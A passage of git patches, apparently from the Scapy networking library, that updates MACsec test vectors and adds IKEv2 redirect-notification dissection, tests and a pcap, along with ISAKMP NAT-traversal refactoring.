Raw(bytes.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333400014DBD2F6A754A6CF728CC129BA6931577")) assert raw(e) == raw(ref) dt = sa.decrypt(e) assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.5.1 GCM-AES-128 (54-octet frame confidentiality protection) sa = MACsecSA(sci=b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01', an=0, pn=0x76D457ED, key=b'\x07\x1B\x11\x3B\x0C\xA7\x43\xFE\xCC\xCF\x3D\x05\x1F\x73\x73\x82', icvlen=16, encrypt=1, send_sci=0) -p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340004"))) +p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(bytes.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340004")) m = sa.encap(p) m[MACsec].ES = 1 iv = sa.make_iv(m) assert raw(iv) == raw(b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01\x76\xD4\x57\xED') e = sa.encrypt(m) -ref = Raw(bytes(bytearray.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457ED13B4C72B389DC5018E72A171DD85A5D3752274D3A019FBCAED09A425CD9B2E1C9B72EEE7C9DE7D52B3F3D6A5284F4A6D3FE22A5D6C2B960494C3"))) +ref = Raw(bytes.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457ED13B4C72B389DC5018E72A171DD85A5D3752274D3A019FBCAED09A425CD9B2E1C9B72EEE7C9DE7D52B3F3D6A5284F4A6D3FE22A5D6C2B960494C3")) assert raw(e) == raw(ref) dt = sa.decrypt(e) assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.5.2 GCM-AES-256 (54-octet frame confidentiality protection) sa = MACsecSA(sci=b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01', an=0, pn=0x76D457ED, key=b'\x69\x1D\x3E\xE9\x09\xD7\xF5\x41\x67\xFD\x1C\xA0\xB5\xD7\x69\x08\x1F\x2B\xDE\x1A\xEE\x65\x5F\xDB\xAB\x80\xBD\x52\x95\xAE\x6B\xE7', icvlen=16, encrypt=1, send_sci=0) -p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340004"))) +p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(bytes.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340004")) m = sa.encap(p) m[MACsec].ES = 1 iv = sa.make_iv(m) assert raw(iv) == raw(b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01\x76\xD4\x57\xED') e = sa.encrypt(m) -ref = Raw(bytes(bytearray.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457EDC1623F55730C93533097ADDAD25664966125352B43ADACBD61C5EF3AC90B5BEE929CE4630EA79F6CE51912AF39C2D1FDC2051F8B7B3C9D397EF2"))) +ref = Raw(bytes.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457EDC1623F55730C93533097ADDAD25664966125352B43ADACBD61C5EF3AC90B5BEE929CE4630EA79F6CE51912AF39C2D1FDC2051F8B7B3C9D397EF2")) assert raw(e) == raw(ref) dt = sa.decrypt(e) assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.5.3 GCM-AES-XPN-128 (54-octet frame confidentiality protection) sa = MACsecSA(sci=b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01', an=0, pn=0xB0DF459C76D457ED, key=b'\x07\x1B\x11\x3B\x0C\xA7\x43\xFE\xCC\xCF\x3D\x05\x1F\x73\x73\x82', icvlen=16, encrypt=1, send_sci=0, xpn_en = True, ssci = 0x7A30C118, salt = b'\xE6\x30\xE8\x1A\x48\xDE\x86\xA2\x1C\x66\xFA\x6D') -p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340004"))) +p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(bytes.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340004")) m = sa.encap(p) m[MACsec].ES = 1 iv = sa.make_iv(m) assert raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\x6A\xB2\xAD\x80') e = sa.encrypt(m) -ref = Raw(bytes(bytearray.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457ED9CA46984430203ED416EBDC2FE2622BA3E5EAB6961C36383009E187E9B0C88564653B9ABD216441C6AB6F0A232E9E44C978CF7CD84D43484D101"))) +ref = Raw(bytes.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457ED9CA46984430203ED416EBDC2FE2622BA3E5EAB6961C36383009E187E9B0C88564653B9ABD216441C6AB6F0A232E9E44C978CF7CD84D43484D101")) assert raw(e) == raw(ref) dt = sa.decrypt(e) assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.5.4 GCM-AES-XPN-256 (54-octet frame confidentiality protection) sa = MACsecSA(sci=b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01', an=0, pn=0xB0DF459C76D457ED, key=b'\x69\x1D\x3E\xE9\x09\xD7\xF5\x41\x67\xFD\x1C\xA0\xB5\xD7\x69\x08\x1F\x2B\xDE\x1A\xEE\x65\x5F\xDB\xAB\x80\xBD\x52\x95\xAE\x6B\xE7', icvlen=16, encrypt=1, send_sci=0, xpn_en = True, ssci = 0x7A30C118, salt = b'\xE6\x30\xE8\x1A\x48\xDE\x86\xA2\x1C\x66\xFA\x6D') -p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340004"))) +p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(bytes.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340004")) m = sa.encap(p) m[MACsec].ES = 1 iv = sa.make_iv(m) assert raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\x6A\xB2\xAD\x80') e = sa.encrypt(m) -ref = Raw(bytes(bytearray.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457ED88D9F7D1F1578EE34BA7B1ABC89893EF1D3398C9F1DD3E47FBD8553E0FF786EF5699EB01EA10420D0EBD39A0E273C4C7F95ED843207D7A497DFA"))) +ref = Raw(bytes.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457ED88D9F7D1F1578EE34BA7B1ABC89893EF1D3398C9F1DD3E47FBD8553E0FF786EF5699EB01EA10420D0EBD39A0E273C4C7F95ED843207D7A497DFA")) assert raw(e) == raw(ref) dt = sa.decrypt(e) assert raw(dt) == raw(m) diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index c6684d6c74d..e723c1bb2fd 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -332,7 +332,7 @@ assert opt.rnextkeyid == 2 assert opt.mac == b"FAKE" = TCP Authentication Option: parse from TCP -p = IP(bytes(bytearray.fromhex("45e0004cdd0f4000ff06bf6b0a0b0c0dac1b1c1de9d700b3fbfbab5a00000000e002ffffcac40000020405b4010303080402080a00155ab7000000001d103d542ee437c6f8ede6d7c4d602e7"))) +p = IP(bytes.fromhex("45e0004cdd0f4000ff06bf6b0a0b0c0dac1b1c1de9d700b3fbfbab5a00000000e002ffffcac40000020405b4010303080402080a00155ab7000000001d103d542ee437c6f8ede6d7c4d602e7")) tcpao = get_tcpao(p[TCP]) assert isinstance(tcpao, TCPAOValue) assert tcpao.keyid == 61 From ef2a779bc53868f9828d1559a9ffe137ebc35bf1 Mon Sep 17 00:00:00 2001 From: "Matthias St. Pierre" Date: Fri, 24 Mar 2023 00:30:33 +0100 Subject: [PATCH 0992/1632] IKEv2: improve dissection of IKEv2 redirect notifications (#3925) * improve dissection of IKEv2 redirect notifications See RFC 5685, section 9 * add some more missing notifications https://www.iana.org/assignments/ikev2-parameters/ikev2-parameters.xml --- scapy/contrib/ikev2.py | 54 ++++- test/contrib/ikev2.uts | 323 +++++++++++++++++++++++--- test/pcaps/ikev2_notify_redirect.pcap | Bin 0 -> 948 bytes 3 files changed, 338 insertions(+), 39 deletions(-) create mode 100644 test/pcaps/ikev2_notify_redirect.pcap diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index a8c9076fb70..221fc2f5fc7 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -35,6 +35,7 @@ PacketListField, ShortEnumField, ShortField, + StrLenField, X3BytesField, XByteField, XIntField, @@ -202,6 +203,7 @@ 44: "CHILD_SA_NOT_FOUND", 45: "INVALID_GROUP_ID", 46: "AUTHORIZATION_FAILED", + 47: "NOTIFY_STATE_NOT_FOUND", 16384: "INITIAL_CONTACT", 16385: "SET_WINDOW_SIZE", 16386: "ADDITIONAL_TS_POSSIBLE", @@ -251,7 +253,22 @@ 16430: "IKEV2_FRAGMENTATION_SUPPORTED", 16431: "SIGNATURE_HASH_ALGORITHMS", 16432: "CLONE_IKE_SA_SUPPORTED", - 16433: "CLONE_IKE_SA" + 16433: "CLONE_IKE_SA", + 16434: "IV2_NOTIFY_PUZZLE", + 16435: "IV2_NOTIFY_USE_PPK", + 16436: "IV2_NOTIFY_PPK_IDENTITY", + 16437: "IV2_NOTIFY_NO_PPK_AUTH", + 16438: "IV2_NOTIFY_INTERMEDIATE_EXCHANGE_SUPPORTED", + 16439: "IV2_NOTIFY_IP4_ALLOWED", + 16440: "IV2_NOTIFY_IP6_ALLOWED", + 16441: "IV2_NOTIFY_ADDITIONAL_KEY_EXCHANGE", + 16442: "IV2_NOTIFY_USE_AGGFRAG", +} + +IKEv2GatewayIDTypes = { + 1: "IPv4_addr", + 2: "IPv6_addr", + 3: "FQDN" } IKEv2CertificateEncodings = { @@ -548,7 +565,7 @@ class IKEv2_Payload(_IKEv2_Packet): name = "IKEv2 Payload" fields_desc = [ ByteEnumField("next_payload", None, IKEv2PayloadTypes), - FlagsField("flags", 0, 8, ["critical", "res1", "res2", "res3", "res4", "res5", "res6", "res7"]), # noqa: E501 + FlagsField("flags", 0, 8, ["critical"]), ShortField("length", None), XStrLenField("load", "", length_from=lambda pkt: pkt.length - 4), ] @@ -723,11 +740,40 @@ class IKEv2_Nonce(IKEv2_Payload): class IKEv2_Notify(IKEv2_Payload): name = "IKEv2 Notify" fields_desc = IKEv2_Payload.fields_desc[:3] + [ - ByteEnumField("proto", None, {0: "Reserved", 1: "IKE", 2: "AH", 3: "ESP"}), # noqa: E501 + ByteEnumField("proto", None, IKEv2ProtocolTypes), FieldLenField("SPIsize", None, "SPI", "B"), ShortEnumField("type", 0, IKEv2NotifyMessageTypes), XStrLenField("SPI", "", length_from=lambda pkt: pkt.SPIsize), - XStrLenField("notify", "", length_from=lambda pkt: pkt.length - 8), + ConditionalField( + XStrLenField("notify", "", length_from=lambda pkt: pkt.length - 8), + lambda pkt: pkt.type not in (16407, 16408) + ), + ConditionalField( + # REDIRECT, REDIRECTED_FROM (RFC 5685) + ByteEnumField("gw_id_type", 1, IKEv2GatewayIDTypes), + lambda pkt: pkt.type in (16407, 16408) + ), + ConditionalField( + # REDIRECT, REDIRECTED_FROM (RFC 5685) + FieldLenField("gw_id_len", None, "gw_id", "B"), + lambda pkt: pkt.type in (16407, 16408) + ), + ConditionalField( + # REDIRECT, REDIRECTED_FROM (RFC 5685) + MultipleTypeField( + [ + (IPField("gw_id", "127.0.0.1"), lambda x: x.gw_id_type == 1), + (IP6Field("gw_id", "::1"), lambda x: x.gw_id_type == 5), + ], + StrLenField("gw_id", "", length_from=lambda x: x.gw_id_len) + ), + lambda pkt: pkt.type in (16407, 16408) + ), + ConditionalField( + # REDIRECT (RFC 5685) + XStrLenField("nonce", "", length_from=lambda x:x.length - 10 - x.gw_id_len), + lambda pkt: pkt.type == 16407 + ) ] diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index 4e35345c5d2..7257ece2741 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -384,9 +384,7 @@ frames = [ length=36, proposal=1, proto='IKE', - SPIsize=0, trans_nb=3, - SPI='', trans=( IKEv2_Transform( next_payload='Transform', @@ -458,30 +456,19 @@ frames = [ next_payload='Notify', flags='', length=8, - proto='Reserved', - SPIsize=0, type='IKEV2_FRAGMENTATION_SUPPORTED', - SPI=b'', - notify=b'' ) / IKEv2_Notify( next_payload='Notify', flags='', length=8, - proto='Reserved', - SPIsize=0, type='REDIRECT_SUPPORTED', - SPI=b'', - notify=b'' ) / IKEv2_Notify( next_payload='None', flags='', length=16, - proto='Reserved', - SPIsize=0, type='SIGNATURE_HASH_ALGORITHMS', - SPI='', notify=b'\x00\x01\x00\x02\x00\x03\x00\x04' ) ), @@ -530,9 +517,7 @@ frames = [ length=36, proposal=1, proto='IKE', - SPIsize=0, trans_nb=3, - SPI='', trans=( IKEv2_Transform( next_payload='Transform', @@ -611,28 +596,19 @@ frames = [ next_payload='Notify', flags='', length=8, - proto='Reserved', - SPIsize=0, type='IKEV2_FRAGMENTATION_SUPPORTED', - SPI=b'', - notify=b'' ) / IKEv2_Notify( next_payload='Notify', flags='', length=16, - proto='Reserved', - SPIsize=0, type='SIGNATURE_HASH_ALGORITHMS', - SPI=b'', notify=b'\x00\x01\x00\x02\x00\x03\x00\x04' ) / IKEv2_Notify( next_payload='None', flags='', length=8, - proto='Reserved', - SPIsize=0, type='MULTIPLE_AUTH_SUPPORTED' ) ), @@ -901,9 +877,7 @@ frames = [ flags='', length=8, proto='IKE', - SPIsize=0, type='INITIAL_CONTACT', - SPI='', notify='' ) / IKEv2_Notify( @@ -911,9 +885,7 @@ frames = [ flags='', length=8, proto='IKE', - SPIsize=0, type='HTTP_CERT_LOOKUP_SUPPORTED', - SPI='', notify='' ) / IKEv2_CERTREQ( @@ -1039,18 +1011,13 @@ frames = [ next_payload='Notify', flags='', length=8, - proto='Reserved', - SPIsize=0, type='MOBIKE_SUPPORTED', - SPI='', notify='' ) / IKEv2_Notify( next_payload=None, flags='', length=8, - proto='Reserved', - SPIsize=0, type='MULTIPLE_AUTH_SUPPORTED' ) ), @@ -1350,14 +1317,300 @@ frames = [ next_payload='None', flags='', length=8, - proto='Reserved', - SPIsize=0, type='MOBIKE_SUPPORTED' ) ), ] +for i, title, data, packet in frames: + print(title) + if i >= 0: + # the raw frame data coincides with the frame from the packet capture + assert data == raw(pcap[i]) + # the scapy packet correctly describes the frame + assert raw(packet) == data + # reassembling the dissected frame yields the original frame + assert raw(Ether(data)) == data + + + += IKEv2 key exchange with REDIRECT + +* Loads and dissects the four frames of the key exchange from a Wireshark +* capture and compares them with manually built scapy packets. + +pcap = rdpcap(scapy_path("/test/pcaps/ikev2_notify_redirect.pcap")) + + +frames = [ + ( + # i: frame number + 0, + # title: + "IKE_SA_INIT request (redirect_supported)", + # data: raw frame data + binascii.unhexlify(''.join(""" + 00505699bfd50050 56991bcc08004500 012cb73300007f11 6aac0a05023c0a05 + 02342ac801f40118 62b8886948814975 28ad000000000000 0000212022080000 + 0000000001102200 0028000000240101 00030300000c0100 0014800e01000300 + 0008020000050000 00080400001c2800 0048001c00002895 d48e470d8cb88196 + 62f3370c57b26cd3 49c16f5ec1b31959 f9ef695480bc7323 52f96d0a7c4a54f1 + d596bb4fcc2f368e 31985a76ea5a7c77 d4310d372d962900 002c4bf3ea6cd0c6 + afe702c567fe7db3 ff973424bb5e9de6 af123a41975a6ffb 266e9c5b4c915795 + 132b2900001c0100 4005509b01b43dc2 8c9df849fd765c64 8a512959ac502900 + 001c010040045312 0985399e14cf2b79 211f375b439bd030 31ac290000080000 + 402e290000080000 4016000000100000 402f000100020003 0004 + """.split())), + # packet: Ether / IP / UDP / IKEv2 / ... + Ether(dst='00:50:56:99:bf:d5', src='00:50:56:99:1b:cc', type=2048) /\ + IP(version=4, ihl=5, tos=0, id=46899, flags=0, frag=0, ttl=127, proto=17, chksum=27308, src='10.5.2.60', dst='10.5.2.52') /\ + UDP(sport=10952, dport=500, chksum=25272) /\ + IKEv2( + init_SPI=b'\x88iH\x81Iu(\xad', + resp_SPI=b'\x00\x00\x00\x00\x00\x00\x00\x00', + next_payload=33, + version=32, + exch_type=34, + flags=8, + id=0 + ) /\ + IKEv2_SA( + prop=IKEv2_Proposal( + trans=( + IKEv2_Transform(next_payload=3, flags=0, length=12, transform_type=1, res2=0, transform_id=20, key_length=256) /\ + IKEv2_Transform(next_payload=3, flags=0, length=8, transform_type=2, res2=0, transform_id=5) /\ + IKEv2_Transform(next_payload=0, flags=0, length=8, transform_type=4, res2=0, transform_id=28) + ), + next_payload=0, flags=0, length=36, proposal=1, proto='IKE', trans_nb=3), + next_payload=34, + flags=0, + length=40 + ) /\ + IKEv2_KE( + next_payload=40, + flags=0, + length=72, + group=28, + res2=0, + ke=b'(\x95\xd4\x8eG\r\x8c\xb8\x81\x96b\xf37\x0cW\xb2l\xd3I\xc1o^\xc1\xb3\x19Y\xf9\xefiT\x80\xbcs#R\xf9m\n|JT\xf1\xd5\x96\xbbO\xcc/6\x8e1\x98Zv\xeaZ|w\xd41\r7-\x96' + ) /\ + IKEv2_Nonce( + next_payload=41, + flags=0, + length=44, + nonce=b'K\xf3\xeal\xd0\xc6\xaf\xe7\x02\xc5g\xfe}\xb3\xff\x974$\xbb^\x9d\xe6\xaf\x12:A\x97Zo\xfb&n\x9c[L\x91W\x95\x13+' + ) /\ + IKEv2_Notify( + next_payload=41, + flags=0, + length=28, + proto='IKE', + type='NAT_DETECTION_DESTINATION_IP', + notify=b'P\x9b\x01\xb4=\xc2\x8c\x9d\xf8I\xfdv\\d\x8aQ)Y\xacP' + ) /\ + IKEv2_Notify( + next_payload=41, + flags=0, + length=28, + proto='IKE', + type='NAT_DETECTION_SOURCE_IP', + notify=b'S\x12\t\x859\x9e\x14\xcf+y!\x1f7[C\x9b\xd001\xac' + ) /\ + IKEv2_Notify( + next_payload=41, + flags=0, + length=8, + type='IKEV2_FRAGMENTATION_SUPPORTED', + ) /\ + IKEv2_Notify( + next_payload=41, + flags=0, + length=8, + type='REDIRECT_SUPPORTED', + ) /\ + IKEv2_Notify( + next_payload=0, + flags=0, + length=16, + type='SIGNATURE_HASH_ALGORITHMS', + notify=b'\x00\x01\x00\x02\x00\x03\x00\x04' + ) + ), + ( + # i: frame number + 1, + # title: + "IKE_SA_INIT response (redirect)", + # data: raw frame data + # data: raw frame data + binascii.unhexlify(''.join(""" + 005056991bcc0050 5699bfd508004500 0086c4d300004011 9d1a0a0502340a05 + 023c01f42ac80072 c9bc886948814975 28ad000000000000 0000292022200000 + 00000000006a0000 004e01004017031c 6d6f6e657962696e 2e6475636b627572 + 672e6469736e6579 2e636f6d4bf3ea6c d0c6afe702c567fe 7db3ff973424bb5e + 9de6af123a41975a 6ffb266e9c5b4c91 5795132b + """.split())), + # packet: Ether / IP / UDP / IKEv2 / ... + Ether(dst='00:50:56:99:1b:cc', src='00:50:56:99:bf:d5', type=2048) /\ + IP(version=4, ihl=5, tos=0, id=50387, flags=0, frag=0, ttl=64, proto=17, src='10.5.2.52', dst='10.5.2.60') /\ + UDP(sport=500, dport=10952) /\ + IKEv2( + init_SPI=b'\x88iH\x81Iu(\xad', + resp_SPI=b'\x00\x00\x00\x00\x00\x00\x00\x00', + next_payload=41, + version=32, + exch_type=34, + flags=32, + id=0 + ) /\ + IKEv2_Notify( + next_payload=0, + flags=0, + length=78, + proto='IKE', + type='REDIRECT', + gw_id_type=3, + gw_id=b'moneybin.duckburg.disney.com', + nonce=b'K\xf3\xeal\xd0\xc6\xaf\xe7\x02\xc5g\xfe}\xb3\xff\x974$\xbb^\x9d\xe6\xaf\x12:A\x97Zo\xfb&n\x9c[L\x91W\x95\x13+' + ) + ), + ( + # i: frame number + 2, + # title: + "IKE_SA_INIT request (redirected_from)", + # data: raw frame data + binascii.unhexlify(''.join(""" + 0050569907660050 56991bcc08004500 013290ac00007f11 91940a05023c0a05 + 02352ac801f4011e cba11c88ee0b7793 d52e000000000000 0000212022080000 + 0000000001162200 0028000000240101 00030300000c0100 0014800e01000300 + 0008020000050000 00080400001c2800 0048001c00004616 8482fe53233fc1e2 + 2f9726b7adfe0dfc f53d1558fd663168 24ceec32d4d33f57 7941d3d52e929b3b + ed0b2eef12886117 cd358655f2f6ffd6 fb54fd48bbc52900 002ca573e33f62cf + 2893f80abed1677c a303249bf90aae99 980052cbdfd9cc6b 6e70605869ef142b + cdfd2900001c0100 40052c07d7519ad8 df23a23027e9e7c2 654b32c4e0f32900 + 001c010040041a1d 001cd4d06f42d1ce 836f7ced61c683b1 87ef290000080000 + 402e2900000e0000 401801040a050234 000000100000402f 0001000200030004 + """.split())), + # packet: Ether / IP / UDP / IKEv2 / ... + Ether(dst='00:50:56:99:07:66', src='00:50:56:99:1b:cc', type=2048) /\ + IP(version=4, ihl=5, tos=0, id=37036, flags=0, frag=0, ttl=127, proto=17, src='10.5.2.60', dst='10.5.2.53') /\ + UDP(sport=10952, dport=500) /\ + IKEv2( + init_SPI=b'\x1c\x88\xee\x0bw\x93\xd5.', + resp_SPI=b'\x00\x00\x00\x00\x00\x00\x00\x00', + next_payload=33, + version=32, + exch_type=34, + flags=8, + id=0) /\ + IKEv2_SA( + prop=IKEv2_Proposal( + trans=( + IKEv2_Transform(next_payload=3, flags=0, length=12, transform_type=1, res2=0, transform_id=20, key_length=256) /\ + IKEv2_Transform(next_payload=3, flags=0, length=8, transform_type=2, res2=0, transform_id=5) /\ + IKEv2_Transform(next_payload=0, flags=0, length=8, transform_type=4, res2=0, transform_id=28) + ), + next_payload=0, + flags=0, + length=36, + proposal=1, + proto='IKE', + trans_nb=3, + ), + next_payload=34, + flags=0, + length=40 + ) /\ + IKEv2_KE( + next_payload=40, + flags=0, + length=72, + group=28, + res2=0, + ke=b'F\x16\x84\x82\xfeS#?\xc1\xe2/\x97&\xb7\xad\xfe\r\xfc\xf5=\x15X\xfdf1h$\xce\xec2\xd4\xd3?\x57\x79\x41\xd3\xd5.\x92\x9b;\xed\x0b.\xef\x12\x88a\x17\xcd5\x86U\xf2\xf6\xff\xd6\xfbT\xfdH\xbb\xc5' + ) /\ + IKEv2_Nonce( + next_payload=41, + flags=0, + length=44, + nonce=b'\xa5s\xe3?b\xcf(\x93\xf8\n\xbe\xd1g|\xa3\x03$\x9b\xf9\n\xae\x99\x98\x00R\xcb\xdf\xd9\xccknp`Xi\xef\x14+\xcd\xfd' + ) /\ + IKEv2_Notify( + next_payload=41, + flags=0, + length=28, + proto='IKE', + type='NAT_DETECTION_DESTINATION_IP', + notify=b",\x07\xd7Q\x9a\xd8\xdf#\xa20'\xe9\xe7\xc2eK2\xc4\xe0\xf3" + ) /\ + IKEv2_Notify( + next_payload=41, + flags=0, + length=28, + proto='IKE', + type='NAT_DETECTION_SOURCE_IP', + notify=b'\x1a\x1d\x00\x1c\xd4\xd0oB\xd1\xce\x83o|\xeda\xc6\x83\xb1\x87\xef' + ) /\ + IKEv2_Notify( + next_payload=41, + flags=0, + length=8, + type='IKEV2_FRAGMENTATION_SUPPORTED' + ) /\ + IKEv2_Notify( + next_payload=41, + flags=0, + length=14, + type='REDIRECTED_FROM', + gw_id_type=1, + gw_id_len=4, + gw_id='10.5.2.52' + ) /\ + IKEv2_Notify( + next_payload=0, + flags=0, + length=16, + type='SIGNATURE_HASH_ALGORITHMS', + notify=b'\x00\x01\x00\x02\x00\x03\x00\x04' + ) + ), + ( + # i: frame number + 3, + # title: + "IKE_SA_INIT response (no_proposal_chosen)", + # data: raw frame data + binascii.unhexlify(''.join(""" + 005056991bcc0050 5699076608004500 0040f24c00004011 6fe60a0502350a05 + 023c01f42ac8002c c8e31c88ee0b7793 d52e63cc9c1919de 33e7292022200000 + 0000000000240000 00080100000e + """.split())), + # packet: Ether / IP / UDP / IKEv2 / ... + Ether(dst='00:50:56:99:1b:cc', src='00:50:56:99:07:66', type=2048) /\ + IP(version=4, ihl=5, tos=0, id=62028, flags=0, frag=0, ttl=64, proto=17, src='10.5.2.53', dst='10.5.2.60') /\ + UDP(sport=500, dport=10952) /\ + IKEv2( + init_SPI=b'\x1c\x88\xee\x0bw\x93\xd5.', + resp_SPI=b'c\xcc\x9c\x19\x19\xde3\xe7', + next_payload=41, + version=32, + exch_type=34, + flags=32, + id=0 + ) /\ + IKEv2_Notify( + next_payload=0, + flags=0, + length=8, + proto='IKE', + type='NO_PROPOSAL_CHOSEN' + ) + ), +] + + for i, title, data, packet in frames: print(title) if i >= 0: diff --git a/test/pcaps/ikev2_notify_redirect.pcap b/test/pcaps/ikev2_notify_redirect.pcap new file mode 100644 index 0000000000000000000000000000000000000000..454753f0addfa6c85c259d0f62abd78a47d793da GIT binary patch literal 948 zcmca|c+)~A1{MYw`2U}Qff2}AEWny_C5W5B3djLrhJdh{`>%pX=`$P*t_+Mi+l?6* z>IJjbaIrGk0I`YI3C1ss5=lEcGCdkSOEuQQOjJ}*;()Lj1(X;VG=OXsMn(o^W(Ecx zpur*yd_WEZ0|yfW11nID1LzhRpdt?j8KB~+SNhy}dv-KVOZsfi6TT_uvgg74xPzM| zBY(cn3~AU?tQ_<+m#fArWM=k@^3(l1Sg(4_48NXgLE6yyFo1d3jnUtBQmr|OXom5(su9uQo3>4B!&d(**?;tlWuH_fcRB=qxRMY@c*qWAYEKeHYVf7Bj2N{>im&<_w0Q)Aw(l$<8ZCh{${|qJ8!+ zG)7r<*sll9x^Z85k%9Wl=Z8|gjgCC{43%S%l4X#&av|U8;<@JhnzxC^nm4w;hsH7} zw)uczCBeu7iZ!6eG2;B{dTs_kpacjb;+#DV9On+7d_ZxY{|u1!xWjFmm_+kH!y) literal 0 HcmV?d00001 From 48148af233298d38b3e951616956b3c988efffa0 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 23 Mar 2023 22:54:06 +0100 Subject: [PATCH 0993/1632] ISAKMP: support nat traversal, various fixes - apply patch related to transform fields dissection (not mine) - support nat traversal (non-esp, etc.) by merging with ikev2's - various improvements to quality of dissection of ISAKMP --- scapy/contrib/ikev2.py | 70 ++++---------------------- scapy/fields.py | 15 ++++++ scapy/layers/ipsec.py | 54 ++++++++++++++++++-- scapy/layers/isakmp.py | 95 +++++++++++++++++++++++++++--------- test/scapy/layers/isakmp.uts | 44 +++++++++++++++++ 5 files changed, 190 insertions(+), 88 deletions(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 221fc2f5fc7..0912d6b741d 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -15,8 +15,12 @@ # Modified from the original ISAKMP code by Yaron Sheffer , June 2010. # noqa: E501 from scapy.packet import ( - Packet, Raw, - bind_top_down, bind_bottom_up, bind_layers, split_bottom_up, split_layers + Packet, + Raw, + bind_bottom_up, + bind_layers, + bind_top_down, + split_bottom_up, ) from scapy.fields import ( ByteEnumField, @@ -38,13 +42,12 @@ StrLenField, X3BytesField, XByteField, - XIntField, XStrFixedLenField, XStrLenField, ) from scapy.layers.x509 import X509_Cert, X509_CRL from scapy.layers.inet import IP, UDP -from scapy.layers.ipsec import ESP +from scapy.layers.ipsec import NON_ESP from scapy.layers.isakmp import ISAKMP from scapy.sendrecv import sr from scapy.config import conf @@ -945,63 +948,8 @@ class IKEv2_PS(IKEv2_Payload): bind_bottom_up(UDP, IKEv2, sport=500) bind_top_down(UDP, IKEv2, dport=500, sport=500) - -split_layers(UDP, ESP, dport=4500) # NAT-Traversal encapsulation -split_layers(UDP, ESP, sport=4500) # NAT-Traversal encapsulation - - -# TODO: the bindings for NAT-traversal (UDP encapsulation on port 4500) -# actually belong into the scapy.layers.ipsec module. They will -# be moved there as soon as the IKEv2 protocol has been promoted -# from scapy.contrib to scapy.layers. - -class UDP_ENCAP(Packet): # RFC 3948 - """ - UDP Encapsulation of IPsec ESP Packets [RFC3948] (for NAT-Traversal) - """ - name = 'UDP_ENCAP' - - @classmethod - def dispatch_hook(cls, _pkt=None, *args, **kargs): - if _pkt: - if len(_pkt) >= 4 and struct.unpack("!I", _pkt[0:4])[0] == 0x00: - return NON_ESP - elif len(_pkt) == 1 and struct.unpack("!B", _pkt)[0] == 0xff: - return NAT_KEEPALIVE - else: - return ESP - return cls - - -class NON_ESP(Packet): # RFC 3948, section 2.2 - - fields_desc = [ - XIntField("non_esp", 0x0) - ] - - def guess_payload_class(self, payload): - return IKEv2 - - -class NAT_KEEPALIVE(Packet): # RFC 3948, section 2.2 - - fields_desc = [ - XByteField("nat_keepalive", 0xFF) - ] - - def guess_payload_class(self, payload): - return conf.raw_layer - - -split_layers(UDP, ESP, dport=4500) -split_layers(UDP, ESP, sport=4500) - -bind_bottom_up(UDP, UDP_ENCAP, dport=4500) -bind_bottom_up(UDP, UDP_ENCAP, sport=4500) - -bind_top_down(UDP, ESP, dport=4500, sport=4500) 